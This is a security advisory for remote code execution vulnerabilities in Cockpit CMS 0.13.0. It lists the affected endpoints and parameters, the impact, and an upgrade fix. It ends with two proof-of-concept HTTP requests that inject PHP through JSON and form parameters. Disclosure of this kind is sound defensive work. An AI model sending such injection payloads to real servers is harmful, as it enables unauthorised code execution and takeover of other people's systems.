📄 Cockpit CMS 0.13.0 Remote Code Execution

Cockpit CMS 0.13.0 - Remote Code Execution
    Advisory ID: RO-16-004
    Severity: Critical
    Vendor: Cockpit
    Product: Cockpit CMS
    Version: 0.13.0
    
    
    Overview #
    
    Multiple Remote Code Execution (RCE) vulnerabilities exist in Cockpit CMS version 0.13.0. The vulnerabilities allow remote attackers to execute arbitrary PHP code on the server.
    
    
    Vulnerability Details #
    
    Affected Versions: 0.13.0 and earlier
    
    Location: Multiple endpoints including /accounts/save, /auth/check, /api/galleries/findOne, /api/collections/findOne
    
    Affected Parameters: account._id, auth[user], filter._id
    
    Root Cause: The vulnerability exists due to improper handling of user input in JSON parameters, allowing PHP code evaluation.
    
    
    Exploitation Requirements #
    
        No authentication required for some vectors
        Direct access to vulnerable endpoints
    
    Impact #
    
    Remote attackers can exploit these vulnerabilities to:
    
        Execute arbitrary PHP code on the server
        Gain complete control of the CMS
        Access sensitive files and databases
        Pivot to internal network resources
    
    Proof of Concept #
    
    POST /cockpit-0.13.0/accounts/save HTTP/1.1
    Host: target.com
    Content-Type: application/json
    
    {"account":{"_id":"'+print(int)0xFFF9999-22+'"}}
    
    POST /cockpit-0.13.0/auth/check HTTP/1.1
    Host: target.com
    Content-Type: application/x-www-form-urlencoded
    
    auth[user]='+print(int)0xFFF9999-22+'
    
    
    
    Solution #
    
    Upgrade to a patched version of Cockpit CMS that includes proper input sanitization.
    
    
    References #
    
        Invicti Advisory NS-16-016
    
    Timeline:
    
        [2016-06-30] - Reported
        [2016-09-19] - Advisory released
    
    Credits: Omar Kurt